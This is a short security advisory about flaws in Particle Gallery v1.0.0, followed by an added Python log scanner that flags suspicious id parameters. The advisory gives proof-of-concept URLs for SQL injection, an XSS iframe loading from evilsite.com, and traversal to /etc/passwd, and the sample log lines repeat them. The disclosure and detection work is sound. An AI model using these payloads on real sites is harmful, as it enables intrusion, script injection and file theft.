Date: 5 Jun 2006 23:37:01 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Particle Gallery v1.0.0

Homepage:
http://www.particlesoft.net/particlegallery/

Affected files:
viewimage.php
viewalbum.php

SQL Injection:
http://www.example.com/viewimage.php?imageid='

XSS Vulnerability proof of concept:
http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html>

Possible Directory Traversal?:
http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/
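
Added example, not part of the original post and not Particle Gallery code: a log check that flags requests to the two affected scripts whose `imageid` or `albumid` value is not a plain number, and labels each hit by the advisory's three categories. It assumes legitimate ids are decimal integers and that the server writes combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter each affected script takes, per the advisory.
WATCHED = {"viewimage.php": "imageid", "viewalbum.php": "albumid"}
# Assumption: legitimate ids are plain decimal integers.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def classify(value):
    """Label a rejected value by the advisory's three categories."""
    if "../" in value or "..\\" in value:
        return "traversal"
    if "<" in value or ">" in value:
        return "markup"
    if "'" in value or '"' in value:
        return "quote"
    return "non-numeric"

def scan(lines):
    """Return (line_no, script, param, value, label) per suspicious request."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qs percent-decodes, so %3Ciframe and <iframe are treated alike.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not VALID_ID.fullmatch(value):
                findings.append((no, script, param, value, classify(value)))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jun/2006:23:40:01 +0000] "GET /viewimage.php?imageid=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jun/2006:23:41:12 +0000] "GET /viewimage.php?imageid=\' HTTP/1.1" 200 812',
    '198.51.100.7 - - [05/Jun/2006:23:41:30 +0000] "GET /viewimage.php?imageid=%3Ciframe%20src=http://evilsite.com/scriptlet.html%3E HTTP/1.1" 200 901',
    '198.51.100.7 - - [05/Jun/2006:23:42:02 +0000] "GET /viewalbum.php?albumid=../../../../etc/passwd/ HTTP/1.1" 404 310',
    '192.0.2.10 - - [05/Jun/2006:23:43:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allow-list (digits only) is the natural input check to apply server-side before either parameter reaches a query, a page, or a file path.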